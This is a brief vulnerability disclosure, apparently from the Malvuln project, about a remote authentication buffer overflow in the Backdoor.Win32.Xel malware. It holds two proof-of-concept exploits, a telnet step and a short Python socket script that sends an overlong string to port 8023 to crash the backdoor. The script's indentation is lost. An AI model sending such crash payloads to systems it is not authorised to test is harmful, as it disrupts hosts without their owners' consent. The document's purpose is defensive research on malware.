Backdoor.Win32.Xel Remote Authentication Buffer Overflow

Backdoor.Win32.Xel Remote Authentication Buffer Overflow

Backdoor.Win32.Xel malware suffers from a remote authentication-related buffer overflow vulnerability.

Exploit/PoC-1:

1
2
3
TELNET x.x.x.x 8023

Enter a long string for password.

Exploit/PoC-2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=8023

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PBARBAR="A"*200+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PBARBAR)
s.close()

print("Backdoor.Win32.Xel / Remote Authentication Buffer Overflow")
print("MD5: 3648c68bfe395fb9980ae547d881572c")
print("By Malvuln");

if __name__=="__main__":
doit()